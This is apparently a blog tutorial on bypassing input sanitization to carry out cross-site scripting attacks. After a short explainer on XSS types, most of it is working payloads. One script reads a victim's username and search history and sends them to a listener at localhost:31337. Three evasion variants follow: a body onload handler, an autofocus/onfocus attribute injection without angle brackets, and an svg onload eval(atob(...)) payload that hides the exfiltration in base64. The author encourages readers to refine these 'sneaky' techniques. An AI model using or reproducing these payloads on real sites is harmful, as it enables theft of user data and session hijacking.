XSS Attacks: advanced techniques to bypass data sanitization

6 min readNov 4, 2023

Disclaimer: this tutorial is for education purposes only. I am not liable if you do something illegal with these techniques. I just think they are pretty cool and worth sharing

What is an XSS attack?

TLDR: XSS attacks allow javascript code to be injected into the DOM of a website and then run directly. Skip to Bypassing data sanitization for the techniques themselves.

Cross-Site Scripting (XSS) is a type of security vulnerability or attack that occurs when a web application allows malicious users to inject malicious scripts into web pages viewed by other users. These scripts are typically written in JavaScript but can be written in other scripting languages as well.

XSS attacks come in different forms, including:

Stored XSS: In this type, the injected script is permanently stored on the web server. When other users access the compromised page, the malicious script is executed.
Reflected XSS: With reflected XSS, the malicious script is not stored on the server but rather reflected off a web application. This typically occurs when a user clicks on a specially crafted link containing the malicious payload.
DOM-based XSS: In this variant, the attack is based on the manipulation of the Document Object Model (DOM) of a web page by injecting malicious scripts. These attacks typically target the client-side code and do not involve communication with the server.

XSS attacks can have serious consequences, including:

Data Theft: Attackers can steal sensitive data, such as login credentials, personal information, and session cookies from unsuspecting users. This stolen information can be used for identity theft or other malicious activities.
Session Hijacking: Malicious scripts can hijack user sessions, allowing attackers to impersonate legitimate users and perform unauthorized actions on their behalf.
Phishing: Attackers can create convincing phishing pages that trick users into entering sensitive information, believing they are interacting with a legitimate site.
Defacement: Injected scripts can modify the appearance and content of a website, defacing it and damaging the site’s reputation.

Data sanitization: a defense (kind of)

Overall XSS vulnerabilites occur when a developer or web application itself takes user input (maybe a comment of a blog post) and injects it directly into the DOM (document object model). Basically this means that any user input is suspect, for example: login, sign up, and comment forms are all good entry points for an attack.

To avoid this, a developer can implement data sanitization on these user forms. This technique involves cleaning, validating, and escaping input data to prevent it from being executed as malicious code within a web application. Cleaning and validation ensure that input adheres to expected formats and removes potentially harmful code (such as code that can be interpreted as script), Escaping encodes special characters to prevent them from being interpreted as code when displayed on a web page. The most basic example of an XSS attack is the following:

An attacker finds a comment form that they realize injects directly into the website DOM. They then enter the following into the form:

<script>alert("Hacked")</script>

If the web application correctly sanitizes input data it will handle the script tag (<script>) and not execute it as code. Applications do this in various ways, however, one common way is to simply strip out the <script> and </script> tags whenever they are present in input. This would result in just the following which will be interpreted as just a string literal:

alert("Hacked")

Bypassing data sanitization

Now for the juicy details you’ve been waiting for… how can we avoid this and still get our script to execute? While any half decent web application will use an industry standard data sanitization library to handle any input it takes in, many do the bare minimum and just strip script tags like I did in the above example. Thats not good news for them, but great news for you as a heartless pirate!

Lets imagine that I’m a malicious actor and I want the following script to execute on my victims web application. For understanding the following code grabs a hypothetical username and search history record item from our victim. It then sends this stolen data to our endpoint http://localhost:31337, muhahah.

 <script>
 setTimeout(() => {
 var username = document.getElementById("logged-in-user");
 var userText = username.textContent;
 var lastSearch = document.getElementsByClassName("history-item list-group-item")[1];
 var searchText = lastSearch.textContent;
 $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+searchText);
 }, 3000);   
 </script>

Technique 1: using a <body> tag (avoids <script>)

<body onload="setTimeout(() => {
    var username = document.getElementById('logged-in-user');
    var userText = username.textContent;
    var dataText = (document.getElementsByClassName('history-item list-group-item'))[1].textContent;
    $.get('http://localhost:31337');
}, 0)">

In the above we utilize a <body> tag with an onload attribute to execute our payload without <script> tags. Looking at some documentation we can see that anything after onload gets treated as javascript, but we don’t need <script> tags for this — sneaky! This means that if our web application just checks input data for script tags we will still get through the sanitzation process.

Technique 2: using onfocus (avoids common tags)

autofocus onfocus=setTimeout(() => {
    var username = document.getElementById('logged-in-user');
    var userText = username.textContent;
    var dataText = (document.getElementsByClassName('history-item list-group-item'))[1].textContent;
    $.get('http://localhost:31337');
}, 0) x=

Lets be realistic and assume that your target website uses a half decent sanitization library. It will then probably remove common html tags such as <body>, <script>, <img>, and with those angle brackets in general. So what do we do? Our code above creates an onfocus event that will execute JavaScript when the element receives the focus, and also adds the autofocus attribute to try to trigger the onfocus event automatically without any user interaction. Finally, it adds x=" to gracefully repair the following markup. This avoids using < brackets and therefore can definitely bypass some sophisticated sanitization systems.

Technique 3: Base64 encoded (avoids using “,‘ and ;)

<svg onload=eval(atob(/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS-1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source)))

Okay… this one is pretty clever! In order to bypass using single quotes, double quotes and semi colons we have to getcreative here. First I took our script payload from the top of this section and encoded it into base64 format. You can use any online encoder, like this one. This outputs the long garbled string of random alphanumeric characters that you see above. Next we place that payload between characters like so:

/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS-1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source

We then take the .source attribute from this. This lets us avoid using quotation symbols by evaluating the contents of /payload/ as a string literal. If this doesn’t make sense, maybe the following statement will:

/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS-1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source
Is the same as writing the following:
"c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS-1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7"

Next we take this base64 payload and decode it live. To do this we use atob(). This is essentially a function that takes base64 encoded data and decodes it to an ASCII string. Here is the documentation, but overall it is pretty self explanatory. Here is exactly what this means in our context :

atob(/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS-1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source)
Is the same as writing

setTimeout(() => {
 var username = document.getElementById("logged-in-user");
 var userText = username.textContent;
 var lastSearch = document.getElementsByClassName("history-item list-group-item")[1];
 var searchText = lastSearch.textContent;
 $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+searchText);
 }, 3000);

Finally, we wrap our base64 payload that decodes dynamically with eval and then place all of this within an <svg> tag onload attribtue. So walking through this, the eval call takes our string javascript code and evaluates it as actual code. The onload attribute then triggers this whole process on page load. This means that when a hacker injects our malicious line, our original payload will execute flawlessly.

Closing thoughts

While these technique are pretty sneaky, they definitely will not bypass all data sanitization libraries (for example, none of these techniques will work on Facebook comment forms). However, I hope that this brief tutorial gave you a taste of what you can do to avoid data sanitization techniques. I definitely only touched the surface, and if you continue to sharpen the techniques above, you can definitely improve them for more specific use cases (especially the base64 one). If you have any questions feel free to comment and if you got here thanks for reading :)!